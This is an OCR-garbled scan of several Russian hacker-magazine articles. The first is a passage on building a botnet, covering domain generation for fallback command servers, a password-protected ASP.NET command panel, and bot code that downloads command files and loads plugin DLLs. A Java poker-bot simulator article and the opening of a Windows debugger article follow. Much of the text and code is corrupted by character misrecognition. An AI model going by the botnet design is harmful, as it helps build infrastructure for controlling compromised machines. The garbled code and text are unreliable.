ные зоны берутся из массива и склеиваются со сгенерированной стро- 
кой, поэтому, чем больше массив с этими элементами, тем шире диапа- 
зон всевозможных вариантов. 

Имея в своем функционале генератор доменного имени, в случае 
недоступности командного центра на основном домене бот генерирует 
новый и связывается с ним. В свою очередь, бот-мастер также имеет в 
наличии аналогичный генератор (с нужным входным параметром зеесі), 
что позволяет ему заранее зарегистрировать новое доменное имя для 
своей «армии». 

Таким образом мы избавились от одного из основных недостатков 
централизованной топологии — возможности уничтожения командно- 
го центра. Однако остается угроза получения контроля над доменом 
и несанкционированной передачи команд ботам. Данная проблема 
решается специально спроектированной админской частью (также 
известной как «административная панель»). 

БОТНЕТ И. МЕТ 

Один из методов защиты от несанкционированной передачи заданий 
ботам заключается в использовании шифрования командного файла на 
стороне сервера. Клиент, коим выступает зараженная машина, имеет 
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ние доступа клиента к ресурсу в зависимости от его имени и роли. 
Например, следующая конфигурация разрешает доступ к ННІ всем 
клиентам, прошедшим аутентификацию, и запрещает всем остальным: 



<аиЩтогІ 2 аЦіоп> 

<а11оѵ^ изегз="*" /> 
<сіепу изегз="?" /> 
</аиЩіогІ 2 аСіоп> 



Список сгенерированных доменов 

в своем распоряжении ключ для расшифровки этого файла. Идея 
хорошая, но мы пойдем другим путем, воспользовавшись прелестями 
современных технологий. 

В июньском номере ][ в статье «Уязвимости ОМЫМЕ» мы рассмотре- 
ли базовые аспекты создания веб-сервисов на основе технологий 
А5Р.МЕТ. Теперь копнем немного глубже и посмотрим, как строятся 
защищенные веб-приложения — это пригодится нам для построения 
административной панели командного центра. Веб-приложение, в роли 
которого выступает «админка», предоставляет ресурсы (то есть команд- 
ный файл) своим клиентам (ботам). Всем «нежелательным» личностям 
веб-приложение должно показывать маршрут в сторону леса. 

Процесс определения санкционированного клиента состоит из двух 
последовательных этапов: 

• Аутентификация — непосредственно распознавание клиента, запра- 
шивающего ресурс; 

• Авторизация — определение, имеет ли аутентифицированный клиент 
необходимые права на запрашиваемый им ресурс. 

Для установки процесса аутентификации в конфигурационном файле 
веб-сервиса Сопбд.ѴѴеЬ необходимо внести соответствующие измене- 



ния: 



<соп:ЕідигаЦіоп> 

<зесигіСу> 

<аиЦ]тепЦісаЦіоп то(3.е= "Соокіе" /> 

</зесигіСу> 

</соп:ЕідигаЦіоп> 

Таким образом мы устанавливаем процесс аутентификации на основе 
Соокіез-файлов. Далее для аутентификации клиента необходимо при- 
нять от него данные (ПзегЕодіп и ПзегРаззѵѵогсІ), сверить их с требуе- 
мыми и, в случае успеха, передать ему соокіез-файлы, которые пона- 
добятся клиенту для получения доступа к защищенной части сайта, где 
хранится командный файл: 

<зсгірЦ 1апдиаде= " с# " гипак= зегѵег> 

ѵоісі Ьодіп_СІіск (ОЬ^ есС зепсіег, ЕѵепСАгдз Е) { 

ІТ ( (ЕзегЕодіп.ѴаІие == "ВокЗікеТеат" ) 

&& (изегРаззѵ70гсі. Ѵаіие == "ВезкІТЕезоигсе" ) ) { 

СоокіеАиЩіепкісакіоп . КесіігескЕготЕодіпРаде ( 
ЕзегЕодіп. Ѵаіие, кгие) ; 

} 

еізе { 

//вывод сообщения о неправильно введенных данных 

} 

} 

</зсгірк> 

В А5Р.МЕТ различают два вида авторизации, которые определяют, есть 
ли у клиента соответствующие права на доступ к запрашиваемому ПРЕ, 
где хранится файл с командами: ПРЕ и Еііе. Нам интересен первый 
способ управления доступом, позволяющий проводить разграниче- 



«Пилить» административную часть ботнета можно не менее продолжи- 
тельное время, чем самого бота, тем более, если в распоряжении 
имеются интересные технологи защиты веб-приложений А5Р.МЕТ, поэ- 
тому мы не будем пытаться объять необъятное, а перейдем к ключевой 
части — боту. 

БОТ В РАЗРЕЗЕ 

Любой современный ботнет должен подразумевать расширение своего 
функционала. Зачем? Ну, например, если у бот-мастера возникло жела- 
ние переквалифицировать свою армию зомби в сеть распределенных 
вычислений, которая будет моделированием последствий ядерных 
взрывов. Платинная архитектура позволяет «развязать» руки админи- 
стратору сети и наращивать или обновлять функционал по мере необ- 
ходимости. Учитывая данный факт, составим алгоритм действий нашего 
бота: 

1 . получение команды от сервера; 

2 . обработка команды, то есть ее классификация на «известную» или 
«неизвестную»; 

3 . обработка соответствующим образом параметров команды в зависи- 
мости от ее типа; 

4 . выполнение команды. 

Получение команд заключает в скачивании текстового файла с сервера 
(соттапсі.іхі;). Реализацию скачивания файла берет на себя функция 
НТТРВо\л7п1оаЛ ( сЬ.аг *Рі1еІІг1, сЬ.аг *Рі1еЫате) . Данная функ- 
ция также используется и для скачивания необходимых .сІЕ для ботнета. 
Я решил не заниматься рутиной, работая с сокетами, а воспользоваться 
стандартной библиотекой, которая присутствует в ѴѴіпсІоѵѵз: ѵѵіпіпеЕсіи. 
Данная ПЕЕ представляет собой АРІ для доступа к общим протоколам 
интернет, включая РТР, НТТР и Оорбег. Это высокоуровневый АРІ, 
позволяющий, в отличие от ѴѴіпЗоск или ТСР/ІР, не заботиться о дета- 
лях реализации соответствующих интернет-протоколов. 
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к'апЛ^44Ш 
і'апсі =19053 
к'апД”23075 
к*ап4=13104 
к^ап(]1=32363 

к'ап4=ЗѲ749 
гап(Л=32Ь78 
к*апЛ=97^0 
і'апгі=28064 
і'ап<Д=2Ш429 
рапа =750 
гапа=4480 
і'апа=38$3 
гапа=ЗШ429 
і'апа=і8586 
і'апа=3 0758 
гапа=3і595 
гаоа=31567 
і'а[іа=24630 



Результат работы генератора псевдослучайных чисел 



> іп^о 

Информация пред- 
ставлена исклю- 
чительно в целях 
ознакомления. За 
незаконное исполь- 
зование ее материа- 
лов грозит уголовная 
ответственность. 



Для получения команд бот должен периодически 
соединяться с сервером, скачивать командный файл 
и соответствующим способом его обрабатывать. Под 
обработкой мы подразумеваем действие, в результате 
которого бот получает две строки: название команды и 
строку, содержащую параметры к ней, перечисленные 
через символ пробела. Командный файл имеет следую- 
щую структуру: 

Структура командного файла 

<команда ( 1 ) > [параметр ( 1 ) ] [параметр (2 ) ] ... 
[параметр ( і ) ] 

<команда(2)> [параметр ( 1 ) ] [параметр (2 ) ] ... 
[параметр ( з ) ] 

<команда(к)> [параметр ( 1 ) ] [параметр (2 ) ] ... 
[параметр (п) ] 

где і, ], к меняются в интервале (1 ; бесконечность). 
Действия бота таковы: 

1. выделение к-ой строки; 

2. передача выделенной строки в функцию, которая реали- 
зует подключение библиотеки, необходимой для выполне- 
ния команды (функция РІидЬіЬгагу ( ) ); 

3. РІидЬіЬгагу ( ) соответствующим образом интерпре- 
тирует строку и выполняет необходимое действие, завися- 
щие от типа команды. 

Парсинг сотппапб.іхі; реализует функция Рагзе (сЬаг 
*Рі1еЫате) . 

В случае необходимости подключения скачанной б[[’ки 
с целью расширения функционала, функция Р[идЫЬгагу 
выполняет следующие инструкции по заранее описанному 
интерфейсу подключения (он также должен быть оформлен 
в самой бШ: 

//подключение библиотеки 
ііРІидіп = ЬоабЬіЬгагу (ЫІЫате) ; 

//определение типа (ВеРТуре) 

РуреЬеР іпР (*ВеРТуре) (сЬаг *) ; 

/* определение адреса функции «Ьоаб», 
которую экспортирует библиотека*/ 

ВеРТуре Ьоаб = (ВеРТуре) 



СеРРгосАЬбгезз (ЬРІидіп, "Ьоаб" ) ; 

/* вызов функции "Ьоаб" и передача параметров 
этой функции*/ 

іпР іСобе= ( *ЬоаЬ) (РагатеРгз) ; 

Функция Іоаб, экспортируемая библиотекой, содержит 
необходимые инструкции, обеспечивающие расширение 
функционала основной программы-бота. 

И ЭТО ТОЛЬКО НАЧАЛО... 

В статье мы немного подсмотрели за процессом приготов- 
ления ботнета по правильному рецепту. Наше внимание 
коснулось большинства аспектов искусства зомбирования: 
проанализированы основные архитектуры бот-сетей, осу- 
ществлена реализация наиболее актуальной топологии 
с устранением присущих ей недостатков, рассмотрена 
довольно перспективная область использования веб- 
сервисов в качестве административной панели со своей 
защищенной зоной, написан платинный бот, который 
по мере желания администратора может мутировать до 
неузнаваемости. И это только начало, ведь сколько нюан- 
сов осталось за кадром: сокрытие исполняемого файла в 
системе, разделение ботнета на подсети и тому подобные 
задачи, которые тебе еще предстоит решить. Я лишь задал 
тебе направление движения, естественно, исключительно в 
ознакомительных целях. 




В эпоху ѴѴеЬ 2.0 популярные сервисы вы- 
полняют роль командных центров 




> СІѴСІ 



На диске тебя ждут 
исходные коды бота 
и генератора доменов 
в виде проекта для 
М5ѴІ5иа[5іибіо2010. 




ЦНТТР://ѴѴѴѴѴѴ 

"■ Г 

> Ііпкз 

• Ь[1:р://ѵѵѵѵѵѵ.хакер. 
ги/ппадагіпе/ 
ха/128/056/1 .азр 
— статья «Вечный 
ботнет: принципы 
защиты больших бот- 
сетей». 

• п[[р://пп5бп. 
тісго5о[[.сот/ги-ги/ 
[іЬгагу/сІсІ335939. 
азрх — разработка 
и развертывание 
защищенных ѵѵеЬ- 
приложений для А5Р. 
МЕТ 

• Ы;[р://бе[ес.ги — 
мой ресурс, где ты 
можешь найти мате- 
риалы о различных 
сетях распределен- 
ных вычислений, а 
также задать вопросы 
и поделиться идеями. 
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СИМУЛЯрі 
ПОКЕРНОГО ОРГАЗМА 

Вкуриваем в кодинг покерных ботов: 
создаем симулятор тренировки 

В этой статье мы рассмотрим создание симулятора покера. Так как 
правила покера немного отличаются между собой, то в качестве 
правил для симуляции мы возьмем правила НоШет Мо ЫтК Рокег 
с сайта РокегЗІагз. На основе симулятора мы сделаем две игры - игра 
компьютера с живым игроком и просто игра компьютерных игроков 
между собой. Первая игра нам понадобится для тестирования. 



ИНТЕРФЕЙСЫ 

Создадим два интерфейса — ііодіе и ІЕѵепіЗіппиІаСоп. Первый интер- 
фейс нужен для того, чтобы унифицировать вызов различных логик. 

То есть у нас имеется один интерфейс, который реализует различные 
логики, и нам не нужно беспокоиться о хранении различных логик 
— мы храним только массив интерфейсов ііодіе и вызываем метод 
этого интерфейса. У данного интерфейса есть только один метод — 
іпС деСАпзѵ/ег ( ТІоаС р, ТІоаС СоСаІВеС , ТІоаС сигВеС , 
ТІоаС роС, іпС ЬеССіпд, іпС тіпВаізе) , он возвращает О, 
когда нужно сбросить (Іоісі), 1 при принятии ставки (саЕ) и 2 при 
увеличении ставки (гаізе). Немного упростим модель — при рейзе 
не будем выставлять значение ставки, а просто увеличим ставку на 
минимально возможное значение. 

Рассмотрим параметры этого метода: р — вероятность выигрыша (про 
нее читай в статье «Натягиваем сетевые рокег гоот’ы» в июньском ] 

[ или на диске к этому номеру), ІоІаІВеІ; — все поставленные игроком 
деньги за игру, сигВеІ; — текущее количество денег, которое нужно 
поставить, роі; — размер банка, Ьеиіпд — номер круга торговли, 
тіпРаізе — минимальное количество денег, на которое нужно повы- 
сить ставку при рейзе. Второй интерфейс нужен для создания различ- 
ных оболочек для симулятора. В нашем случае будет две оболочки — для 
игры компьютерных игроков с человеком и для игры компьютерных 
игроков между собой. В интерфейсе ІЕѵепіЗіппиІабоп определены мето- 
ды, которые позволяют сообщать оболочке обо всех изменениях в игре. 
Перечислим эти методы: 



сЬапдеВоагсіСагсі ( іпС [] Ьоагй) — метод вызывается при 
изменении карт на столе, сЬапдеРоС (іпС роС) вызывается 
при изменении размера банка, сЬапдеМопеуОПРІауегз (іпС [ ] 
топеу) вызывается при изменении количества денег игро- 
ков, розСВіІІегМеззаде (ЗДгіпд теззаде) вызывается при 
отправке сообщений дилера, сІтапдеВіІІегРозіСіоп ( іпС 
розОРВеаІег) вызывается при изменении позиции дилера, 
сЬапдеРІауегЗЦаЦиз ( іпС ріауег, іпС зСаСиз, іпС [ ] Ііапсі) 
вызывается при изменении статуса игрока. 

СХЕМА СИМУЛЯТОРА 

Как известно, правила покера неоднородны и склонны друг от друга 
отличаться. Например, в круге торговли. Так, по правилам с сайта 
РокегВіагз после первого круга торговли первым ходит активный игрок 
слева от дилера, а по другим правилам первым ходит игрок слева от 
игрока, который ходил первым на прошлом круге торговли. В симулято- 
ре реализованы правила НоШет Рокег с сайта РокегЗіагз. По размеру 
ставок будем делать не МоЕітіІ: и не Еітіі;, а кое-что свое — ограничим 
размер рейза текущей ставкой. 

Всего логик семь: АддгеззіѵеЕодіс (разыгрывает даже слабые руки), 
СаибоизЕодіе (разыгрывает только сильные руки), РабопаІЕодіе (дей- 
ствует рационально), РаізеЕодіс (все время повышает ставку), Саиіодіе 
(все время поддерживает ставку), ЕоІбЕодіс (все время сбрасывает), 
РапботЕодіе (случайно ходит). 

АддгеззіѵеЕодіс, СаибоизЕодіе и РабопаІЕодіе используют в принятии 
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Ш СопБОІе ЕЗ 

НоИегтіСопбоІе раѵэ АррІісаОоп] С:\Заѵа\|геб\Ып\;аѵаѵѵ.ехе {7 
||начало раунда И1 
Дилер 1-ый игрок 
Деньги игроков: 

1-ый 750$ 

;2“ЫЙ 750$ 

ІЗ-ЫЙ 750$ 

4-ЫЙ 750$ 

|5-ый 750$ 
і€-ый 750$ 

'7-ыЙ 750$ 

|8-ый 750$ 

'Э“ЫЙ 750$ 



Карты 


1-го 


игрока 


8з 


аа 


Карты 


2-го 


игрока 


2з 


9з 


Карты 


3-го 


игрока 


дь 


Юс 



Форма НоШетСопзоІе 



решений формулу р*ро1: = ѵѵіп и сравнивает ѵѵіп со своими ставками. Иначе 
говоря, использует формулу, которую мы обсуждали в прошлой статье (если 
хочешь освежить память — вставь в свою ЭВМ диск к этому журналу и 
зачитай ее). Единственное, что — СаибоизЕодіс уменьшает вероятность, 
чтобы разыгрывать меньше рук, а АддгеззіѵеЕодіс увеличивает, чтобы 
разыгрывать больше. Оболочка НоЫетРогт рисует форму на зѵѵіпд’е и 
реализует два интерфейса — ІЕѵепіЗіппиІабоп и ІЕодіс. Первый интерфейс 
нужен для того, чтобы отображать на форме все события симуляции — раз- 
дачу карт, сообщения дилера, изменения состояний игроков и т.д. Второй 
интерфейс мы создаем, чтобы пользователь мог сообщать симулятору свои 
действия — ЕоШ, СаЕ или Ваізе. Форма отображает все карты игроков и 
вероятности их выигрыша, поэтому она не подходит для честной игры с 
компьютером, но зато идеально подходит для отладки симулятора. 
НоШетСопзоІе просто выводит все сообщения дилера на экран. 

ПОРЯДОК СИМУЛЯЦИИ 

Для начала — небольшой алгоритм. Итак: 

1 ) Поставить большой и малый блайнды; 

2 ) Раздать карты игрокам (Пре флоп); 

3 ) Провести круг торговли; 

4 ) Положить три карты на стол (Флоп); 

5 ) Провести круг торговли; 

6 ) Положить четвертую карту на стол (Терн); 

7 ) Провести круг торговли; 

8 ) Положить пятую карту на стол (Ривер); 

9 ) Провести круг торговли; 

10 ) Открыть карты и определить выигрышную комбинацию. 
Соответственно, после каждого круга торговли нужно проверять, не 
остался ли в игре только один игрок. Если да, то весь банк уходит ему. 
Количество игроков, которые будут играть, равно девяти. Во время 
игры их может стать меньше, но в начале их будет именно девять. Это 
сделано в целях упрощения симуляции — не надо заботиться о длинах 
массивов. 

КОД СИМУЛЯТОРА 

Определимся с тем, что должен знать симулятор. Во-первых, симу- 
лятор должен иметь следующие данные об игроках: их деньги 
(топеуОІРІауегз), карты (бапсЮІРІауетз) и их состояние (в игре или 
вышли) — зФІеОІРІауегз. Во-вторых, должен знать позицию дилера 
(розОЮеаІег), количество денег в банке (роі:), размер большого блайн- 
да (ЬідВИпб) и текущие карты на столе (Ьоагб). Для работы логики 
принятия решений нужно также запоминать, сколько денег положил 
в банк каждый из игроков за текущую игру(Ы:а[Ве1:). И самое глав- 




Форма НоШетРогт 



ное — симулятор должен знать, что за игроки играют за столом, то 
есть у него должен быть список всех игроков (р[ауег5ЕІ5І:). Методы, 
нужные для симуляции: Цгайе ( іпС ЬеССіпд) — метод торговли, 
зСагСОате ( ) — главный метод, в котором происходит игра, іпД 
деСЗіпдІеРІауег ( ) — если в игре остался один игрок, то метод 
вернет индекс этого игрока, іпД деСАсСіѵеРІауег ( ) — количество 
активных игроков в игре. К этим методам добавляются несколько зеі- 
методов для изменения значений по умолчанию — зеСВідВІіпсі ( іпС 
ЬідВІіпсі) , зеСВоипсіСоипЦ (іпС гоипйСоипЦ) . Можно сделать 
метод по изменению количества денег перед игрой, но я считаю, это 
не критично, ведь, в конце концов, это симулятор для тестирования 
алгоритмов, а там не важно, сколько денег у игроков в начале игры. 
Хотя, если делать на основе этого симулятора приложение для игры в 
покер, то стоит реализовать данный метод, плюс сделать возможность 
изменения количества игроков в начале игры. Теперь рассмотрим под- 
робнее методы игры и торговли. 

8ТАРТ6АМЕ 

Шаги симуляции в теории расписаны выше, на практике же к ним 
добавляются следующие действия: обнуление переменных перед 
началом каждого раунда, перемешивание карт перед началом каждого 
раунда, проверка на наличие более одного игрока в игре после каж- 
дого круга торговли. Небольшое замечание: хотя перемешивание карт 
и занимает больше времени, чем вытаскивание случайной карты (как 
было сделано при определении вероятности выигрыша в прошлой ста- 
тье), более наглядно и удобно это демонстрируется при сдаче карт. Если 
производительности будет не хватать, то можно будет оптимизировать 
этот алгоритм. 

Еще можно свернуть код проведения игры в цикл, поскольку сейчас там 
имеют место повторяющиеся участки с проверками и проведение круга 
торговли. Однако, их всего четыре, они не занимают много места, и при 
сворачивании в цикл нужно будет изменять алгоритм раздачи карт на 
стол, поэтому пока оставим все как есть. 

В исходном коде часто встречается такая конструкция: 

X = (х + 1) % 9; 

Эта массивная конструкция представляет собой всего лишь цикличе- 
ское увеличение значения переменной х от О до 8-9. В данном случае 
оно означает количество игроков за столом. 

ТРАОЕ 

Входной параметр в методе, которой проводит круг торговли 
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0 ) { 



Схема симулятора 

— номер круга торговли. Это 1 (пре-флоп), 2 (флоп), 3 (терн), 4 
(ривер). В начале метода проверяем на первый круг торговли, 
и если да, то находим позиции малого и большого блайндов 
и кладем деньги в банк. Далее происходит сам круг торговли. 
Непосредственно перед ходом каждого игрока проверяются сле- 



После этих проверок можно переходить непосредственно к определе- 
нию текущего хода игрока. Для этого вычисляем вероятность выигры 
ша игрока на основе его карт, карт на столе и количества игроков и 
вызываем метод интерфейса Ііодіс для определения хода игрока: 

Вызов методов расчета вероятности и принятия решений 

бІоаС р=1одіс . деСРгоЬаЬіІіСуОШіп ( 

ІіапсіОіЕРІауегз [сигРІауег] , Ьоагсі, деСАсСіѵеРІауегз () ) ; 

іпС асСіоп=р1ауегзЬізС . деС (сигРІауег) . деРАсРіоп (р , 



Метод для определения хода пользователя 



риЫіс іпС деСАсСіоп ( : ІоаР р, РІоаТ РоРаІВеР, гІоаР 
сигВеР , РІоаР роР , іиР ЬеРРіпд, і . і. тіпКаізе) { 
(сигВеР == 0) { 

ЬРпСаІІ . зеРТехР ( "Сііеск" ) ; 

} е1' зе { 

ЬРпСаІІ . зеРТехР ( "Саіі " + 

ЗРгіпд . ѵаІиеОР (сигВеР) ) ; 

} 

ЬРпСаІІ . зеРѴізіЫе (Ргие) ; 

ЬРпРоіЬ. зеРѴізіЫе (Ргие) ; 

ЬРпКіазе . зеРѴізіЫе (Ргие) ; 

ЬРпКіазе . зеРТехР ( "Каізе " + 

ЗРгіпд. ѵаІиеОР (сигВеР + тіпКаізе)); 

Ргате . гераіпР ( ) ; 
асРіоп = -1; 

/Рііе (асРіоп == -1) { 

і-гу { 

ТЬгеасі. зіеер ( 5 00 ) ; 

} саісР ( ІпРеггирРесіЕхсерРіоп е) { 
е . ргіпРЗРаскТгасе ( ) ; 

} 

Ргате . гераіпР ( ) ; 

} 

ЬРпСаІІ . зеРѴізіЫе ( Раізе) ; 

ЬРпРоРЬ . зеРѴізіЫе ( Раізе) ; 

ЬРпКіазе . зеРѴізіЫе ( Раізе) ; 

Ргате . гераіпР ( ) ; 
асРіоп; 

} 

дующие параметры: больше ли одного игрока в игре, может ли 
текущий игрок играть. При повторном круге торговли проверяет- 
ся, не равна ли ставка текущего игрока максимальной ставке (то 
есть нужно ли игроку еще вкладывать деньги в банк), и есть ли у 
игрока вообще деньги. 

Проверки перед началом торговли 

/ / увеличиваем номер текущего игрока 
сигРІауег = (сигРІауег +1) % 9; 

іР (деРЗіпдІеРІауег ( ) != -1) { 

Ьгеак; 

} 

ІР ( зРаРеОРРІауегз [сигРІауег] == Раізе) { 
сопРіпие; 

} 

ІР ( (гереаРТгаЬе == Ргие) && (ЬеРОРРІауегз [сигРІауег] 



РоРаІВеР [сигРІауег] + ЬеРОРРІауегз [сигРІауег] , 
тахВеР-ЬеРОРРІауегз [сигРІауег] ,роР , ЬеРРіпд, 
тахВеР = = 0?ЬідВІіп(1:тахВеР ) ; 

Метод расчета вероятности вызывается со следующими параметрами: 
текущие карты игрока, карты на столе и количество активных (тех, кто 
не сбросил карты) игроков в игре. 

Первый параметр в методе деіАсбоп — вероятность выигрыша; 
второй — сумма всех поставленных денег за прошлые круги тор- 
говли и поставленных денег на текущем круге торговли; третий 
параметр — то количество денег, которое нужно поставить игроку, 
чтобы уравнять ставки, то есть разность между максимальной 
ставкой на текущем круге торговли и текущей ставкой игрока; 
четвертый параметр — размер банка; пятый — номер круга тор- 
говли, шестой — минимальное количество денег, которое нужно 
поставить при рейзе. Здесь мы приняли его как значение мак- 
симальной ставки за текущий круг торговли или, если эта ставка 
равна нулю, размер большого блайнда. После получения действия 
от игрока (переменная асбоп) выполняем это действие. Алгоритм 
таков: если игрок сделал Ь[с1, то делаем его неактивным; если 
са[[, то сначала проверяем, может ли он поставить деньги, или 
сразу идет а[[-іп, а потом выполняем требуемое действие, то есть 
или ставим часть денег, или ставим все, что есть; если гаізе, то 
сначала уравниваем ставку игрока до максимальной ставки, а 
потом ставим оставшуюся часть денег, требуемую для рейза. В 
общем случае при ставке следует проверять, есть ли требуемая 
сумма на счету у игрока, если нет, то ставим все оставшиеся день- 
ги (а[[-іп). После проведения ставок всех игроков проверяем, все 
ли игроки поставили одинаковое количество денег. Если кто-то не 
поставил, и у него при этом еще есть деньги, проводим повторный 
круг торговли. 

СИМУЛЯЦИЯ 

Перед началом игры нужно добавить игроков. Это делается следующим 
образом: 

Добавление игроков для игры в Но[с1еппРогпп 

ЬізС<ІЬодіс> р1ауегзЬізС=пеѵ^ АггауЬізС<ІЬодіс>(); 
рІауегзЬізС . аЬс! ( ігате) ; 
рІауегзЬізк . аЬс! (пе\л; РоІЫодіс ( ) ) ; 
рІауегзЬізР . асісі (пеѵ7 СаиСіоизЬодіс ( ) ) ; 
рІауегзЬізС . асісі (пеѵ7 СаІІЬодіс ( ) ) ; 
рІауегзЬізР . асіЬ (пеѵ7 КаСіопаІЬодіс ( ) ) ; 
рІауегзЬізС . асісі (пе^ АддгеззіѵеЬодіс ( ) ) ; 
рІауегзЬізк . аЬЬ (пе\т СаикіоизЬодіс ( ) ) ; 
рІауегзЬізС . аЬЬ (пе\л? АддгеззіѵеЬодіс ()); 
рІауегзЬізЬ . аЬсі (пе\л; КаізеЬодіс ( ) ) ; 

Во второй строчке мы добавляем в качестве игрока текущую форму, это 
означает, что все методы принятия решений для первого игрока будут 
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Правила покера: 

: / /ѵтѵлл?. рокегЬопиз . огд . иа/тепи/ргаѵі1а . 
к^Рр : / /шш . Реііаззкіу-Ііоісіет. іпРо/ 
кРРр : / рокегзРагз . сот/ги/рокег/датез/ 

Рехаз-коісіет/ 

Фундаментальная теорема покера: 

кРРр : / /рокег-ѵ7Ікі . ги/рокег/Фундаментальная_ 
теорема_покера 

Вики по покеру: 

кРРр : / /рокег-ѵ7Ікі . ги/ 



вызываться из этой формы. Он, в свою очередь, будет спра- 
шивать пользователя, что делать — ІоИ, саіі или гаізе. 

Для начала проведем игру между человеком и компью- 
терными игроками, проверим работу правил симуляции 
— как раздаются карты, как ходят игроки, как происходит 
смена дилера. Я ошибок не нашел, но они наверняка 
там есть. Поэтому если ты что-то нашел, или у тебя будут 
предложения по улучшению программы, пиши мне на 
бтгезеШтаіІ.ги 

Перечислю некоторые неточности в симуляции, чтобы 
знать, где можно доделать симулятор: 

1) Фиксированное количество игроков. Можно сделать от 
двух до десяти. 

2) В НоІбетРогт не отображается фишка дилера, хотя 
метод сЬапдеОіиегРозШоп при смене дилера вызы- 
вается. Нужно добавить на форму возле игрока-дилера 
пометку. 

3) Фиксированное количество денег в начале игры. Можно 
сделать изменение этого значения перед игрой. 

4) Только целые значения большого и малого блайнов. 
Сделать тип і^іоаі; для них. Іпі: был выбран только из-за 
производительности... и то, наверное, это спорный выбор. 

5) Неправильный выбор минимального значения ставки 
при рейзе. Сделать вычисление минимального рейза по 
правилам. Ссылка на них есть в статье. 

6) Фиксированное увеличение ставки при рейзе. Сделать 
значение рейза динамическим — от минимального значе- 
ния до максимального. 

7) При открытии карт, если есть игроки с одинаковыми 
картами, выигрывает только первый игрок. Можно это 
исправить, чтобы выигрыш делился поровну между игро- 
ками. Хотя эта ошибка будет повторяться нечасто (все-таки 
вероятность того, что у игроков будут две одинаковые по 
силе комбинации, мала), лучше все же реализовать ее по 
правилам. После того, как был протестирован алгоритм 
симуляции, запустим несколько десятков раундов в оболоч- 
ке НоШетСопзоІе. Игроки там распределены следующим 
образом: 

Добавление игроков для игры в НоИетСопзоІе 

рІауегзЬізС . асісі (пе\т КаСіопаІЬодіс ( ) ) ; 
рІауегзЬізС . асісі (пе\т РоІсіЬодіс ( ) ) ; 
рІауегзЬізС . асісі (пе\т СаиРіоизЬодіс ( ) ) ; 
рІауегзЬізС . асісі (пе\л^ СаІІЬодіс ( ) ) ; 
рІауегзЬізС . асісі (пе\т СаиРіоизЬодіс ( ) ) ; 
рІауегзЬізР . асісі (пе\т АддгеззіѵеЬодіс ( ) ) ; 



рІауегзЬізР . асісі (пеѵ^ КапсіотЬодіс ( ) ) ; 
рІауегзЬізР . асісі (пе\т АддгеззіѵеЬодіс ( ) ) ; 
рІауегзЬізЬ . асісі (пеѵ^ КаізеЬодіс ( ) ) ; 

50 раундов на моем ноуте выполнялись около 15 минут. В 
принципе, приемлемое значение. Количество денег после 
49 раундов следующее (начальное количество у всех оди- 
наково — $750): 

1- й - $580 

2- й - $590 

3- й - $570 

4- й - $2220 

5- й - $570 

6- й — $680 

7- й - $0 

8- й - $750 

9- й - $790 

После второй симуляции: 

1- й - $570 

2- й - $560 

3- й - $580 

4- й - $2450 

5- й - $590 

6- й - $1110 

7- й - $0 

8- й - $890 

9- й - $0 

ВЫВОД 

Теперь самое главное — интерпретация результатов. 
Выше можно заметить, что самый успешный игрок 
— Саиіодіс, за ним следует Ваізеіодіс (в первом 
случае) и Аддгеззіѵеіодіс (во втором случае). Почему 
так? Ведь самый оптимальный алгоритм у нас — это 
Ваііопаііодіс и, по идее, он должен всех обыгры- 
вать? Да, это так, но на данном этапе этот алгоритм 
не учитывает одной важной составляющей — исто- 
рии рук, то есть того, как ходят остальные игроки 
при тех или иных картах и текущих ходах игроков. А 
ведь история рук позволяет узнать, что значат ходы 
игроков — блефуют ли они (то есть колируют и рей- 
зят со слабыми руками) или у них действительно 
сильные карты. Больше информации об игроках, по 
теореме покера, приводит к лучшим ходам. Так как 
он это не учитывает, а основывается только на став- 
ках и размере банка, то получается, что он много рук 
не разыгрывает, а сбрасывает. В отличие от других 
игроков — Саиіодіс, Ваізеіодіс и Аддгеззіѵеіодіс. 

Они же разыгрывают большой диапазон рук, то есть 
блефуют. Кстати, хотел бы сделать небольшое замеча- 
ние к своей прошлой статье. В условии определения 
действия вместо 5В нужно использовать тіпВаізе, 
где тіпВаізе — минимальный размер ставки, который 
нужно сделать при рейзе. Он равен последней ставке 
игрока, который ходил до нас. В общем, твори, дора- 
батывай логику и обязательно пиши нам письма, ведь 
именно благодаря твоим отзывам — от критичных и 
даже агрессивных до позитивных и даже благодарных 
:) — мы приняли решение и дальше развивать тему 
кодинга покерных ботов. Если все пойдет нормально, 
то в следующей статье мы реализуем взаимодействие 
с клиентом покер-рума — считывание информации и 
нажимание на кнопки. 




> ІП^О 

Пока в симуляторе 
есть неточности, 
но если их ис- 
править и сделать 
хороший интерфейс 
НоІбетРогт, то 
можно будет ис- 
пользовать его для 
тренировки игры 
в покер. 




> СІѴСІ 

На диске тебя ждут 
исходники. Они снаб- 
жены подробнейшей 
документацией 
в формате ЗаѵаВос 
и комментариями 
в коде, так что разо- 
браться с ними не 
составит труда. Текст 
прошлой статьи 
лежиттам же. 




НТТР://ѴѴѴѴѴѴ 

і 

> Ііпкз 

Много документации 
по покеру на сайте 
Ы:І:р://рокег-ѵѵікі.ги 
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СООІЫ6 



I Александр Эккерт аІекзапсІг-еНккегиЭгатЫег.ги 



Исследуем недра операционной системы 
с помощью дебаггера и не только 



У Стивена Кинга есть произведение «Потаенное окно, потаенный 
сад». Не могу сказать, что я люблю творчество зтого писателя, но 
если ты не читал зту книгу, настоятельно советую найти и прочесть. 
Очень занимательная и одновременно пугающая книга. В ней со 
всей присущей Стивену Кингу ужасающей красотой изложения 
рассказывается о том, какие тайны может хранить в себе сознание 
любого человека. 



Вот и сегодня мы, наверное, не будем разговаривать на какую-то кон- 
кретную тему. Мы просто немного полазаем в потаенном саду ѴѴіпсІоѵѵз, 
забравшись туда через потаенное окно дебаггера :). Я попробую рас- 
сказать о скрытых местах, странностях и неизвестностях операционной 
системы ѴѴіпсІоѵѵз. Эти знания помогут тебе, как программисту, лучше 
знать, понимать и использовать эти самые потаенные места в своих 
грязных целях. 

ВВЕДЕНИЕ 

Даже по прошествии многих лет, потраченных на изучение внутренностей 
операционной системы и системного кодинга, понимаешь, что постичь 
все тонкости ОС вряд ли удастся. Я не имею в виду именно себя — такого 
мнения придерживаются многие программисты, с которыми я знаком. 

При этом зачастую единственным инструментом, позволяющим выпытать 
те или иные секреты операционной системы, становится отладчик или 
дебаггер. Хотя не все любят возиться с отладчиком, положения дел это не 
меняет — если хочешь находить, простите за каламбур, потаенные окна в 
ѴѴіпсІоѵѵз — без него не обойтись. Итак, начнем. 

ЗАГАДОЧНЫЙ ПАРАМЕТР ІРРЕЗЕРѴЕВ В ВИМАШ 

